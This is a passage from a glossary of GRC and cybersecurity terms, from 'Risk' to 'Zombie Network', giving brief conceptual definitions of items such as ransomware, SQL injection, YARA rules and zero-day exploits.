The shared values, beliefs, and behaviors within an organization that influence how risks are perceived and managed.
Risk Identification
The process of recognizing and documenting potential risks that could affect an organization’s objectives.
Risk Management
The systematic process of identifying, assessing, prioritizing, and managing risks to achieve organizational objectives.
Risk Mitigation
Actions taken to reduce the likelihood or impact of identified risks.
Risk Register
A centralized document that captures and tracks information about identified risks, including their status and mitigation plans.
Remediation
The process of correcting or resolving issues, deficiencies, or non-compliance identified during audits or assessments.
Records Management
The systematic control of an organization’s records, including their creation, storage, retrieval, and disposal, to ensure compliance and efficient business operations.
Root Cause Analysis
A methodical process for identifying the underlying causes of problems or incidents to prevent their recurrence.
Cybersecurity Terms in R
Ransomware
Malicious software that encrypts a user’s files and demands payment for their release.
Red Team
A group of security professionals who simulate cyberattacks to test and improve an organization’s defenses.
Reverse Engineering
The process of analyzing a system, software, or network to understand its design and functionality, often for security research.
Rootkit
A type of malicious software that provides unauthorized access to a computer or network while hiding its presence.
Role-Based Access Control (RBAC)
A method of restricting access to systems and resources based on the roles assigned to individual users within an organization, rather than on the identity of each user.
Router
A network device that forwards data packets between computer networks, often providing firewall capabilities.
GRC Terms in S
Sarbanes-Oxley Act (SOX)
U.S. legislation that establishes requirements for public company boards, management, and public accounting firms to ensure transparency and accountability in financial reporting.
Scenario Analysis
The process of examining and evaluating possible future events or situations to understand their potential impact on an organization.
Social Responsibility
The ethical and transparent conduct of an organization, taking into account its impact on society, the environment, and the well-being of stakeholders.
Stakeholder
Individuals or groups that have an interest, involvement, or concern in an organization’s activities, objectives, or performance.
Strategic Risk
Risks arising from factors that may affect an organization’s ability to achieve its long-term objectives and strategic goals.
System Development Life Cycle (SDLC)
The process of planning, creating, testing, deploying, and maintaining an information system.
Systemic Risk
The risk of a widespread failure within a financial system, market, or economy that could have a cascading impact.
Cybersecurity Terms in S
Scareware
Malicious software or content designed to deceive users by presenting false security threats or misleading information, often in an attempt to trick them into paying for unnecessary products or services.
Secure Sockets Layer (SSL)
A cryptographic protocol that provides secure and encrypted communication over the internet, often used to secure sensitive information during online transactions.
Security Information and Event Management (SIEM)
A security solution that collects, correlates, and analyzes log and event data from across an organization's systems and network devices to detect, investigate, and respond to security incidents.
Social Engineering
Techniques used by hackers to manipulate or deceive individuals into revealing sensitive information or performing certain actions that compromise security.
Spoofing
The act of impersonating someone or something else in order to deceive users or systems. This can involve IP spoofing, email spoofing, or website spoofing, among others.
SQL Injection
A type of web application attack where an attacker injects malicious SQL code into a vulnerable database query, potentially allowing unauthorized access or manipulation of data.
GRC Terms in T
Third-Party Risk Management
The process of identifying, assessing, and mitigating risks associated with external vendors, suppliers, and service providers.
Testing and Assurance
Processes and activities designed to evaluate the effectiveness of controls, systems, or processes within an organization.
Time-to-Recovery (TTR)
The time it takes to restore normal operations after a disruptive event or incident.
Tone at the Top
The ethical and compliance values set by an organization’s leadership, influencing the organization’s culture and behavior.
Cybersecurity Terms in T
Trojan Horse
Malicious software disguised as legitimate software to deceive users and gain unauthorized access to a system.
Transport Layer Security (TLS)
A cryptographic protocol that provides privacy and data integrity for communication between applications and users over the internet.
Threat Surface
The sum of all potential entry points or vulnerabilities in a system that can be exploited by cyber threats.
Transmission Control Protocol/Internet Protocol (TCP/IP)
The fundamental suite of protocols governing the internet.
GRC Terms in U
Underlying Controls
The foundational controls and mechanisms that support an organization’s overall governance, risk, and compliance efforts.
Unified Compliance Framework
A framework that consolidates multiple regulatory requirements and standards into a single set of controls to simplify compliance efforts.
User Access Management
The process of managing and controlling user access to information systems and data, ensuring appropriate levels of access based on roles and responsibilities.
Cybersecurity Terms in U
Unified Threat Management (UTM)
A comprehensive security solution that combines multiple security features into a single platform or appliance.
User Account Control (UAC)
A security feature in Windows operating systems that prompts users for permission before allowing certain system changes.
GRC Terms in V
Value at Risk (VaR)
A statistical measure used to quantify the potential financial loss or risk exposure within a specific time frame and confidence level.
Vendor Risk Management
The process of assessing and mitigating risks associated with third-party vendors, suppliers, and service providers.
Volatility
The degree of variation of a trading price series over time, often used in financial risk analysis.
Vulnerability
Weaknesses or flaws in a system, application, or process that could be exploited by threats to compromise the security or functionality of the system.
Cybersecurity Terms in V
Virtual Private Network (VPN)
A network technology that creates a secure and encrypted connection over a less secure network, such as the internet.
Virtual Local Area Network (VLAN)
A network segmentation technique that creates multiple logical networks within a single physical network.
GRC Terms in Y
Yield Curve Risk
A graphical representation of the relationship between the interest rates and the time to maturity for a set of fixed-income securities, often used in risk analysis and financial planning.
Cybersecurity Terms in Y
YARA Rules
YARA is a pattern-matching tool for identifying and classifying malware or other malicious activities. YARA rules are used to define conditions for recognizing specific patterns in files or processes.
GRC Terms in Z
Zero Trust
A security framework that assumes no level of trust by default, requiring verification for every access request, regardless of whether it originates from inside or outside the network perimeter.
Zone
A segment or area within a network that has a defined level of security requirements or restrictions, often used in network architecture to control and monitor access.
Cybersecurity Terms in Z
Zero-Day (0-Day)
A vulnerability in software or hardware that is unknown to the vendor or the public, making it a potential target for exploitation before a fix or patch is available.
Zero-Day Exploit
An attack that takes advantage of a software vulnerability on the same day the vulnerability becomes publicly known, with no available fix or patch.
Zone Transfer
The process of replicating DNS (Domain Name System) data from a primary server to a secondary (backup) server.
Zombie Network
A group of compromised computers or devices that are controlled by a hacker to perform malicious activities.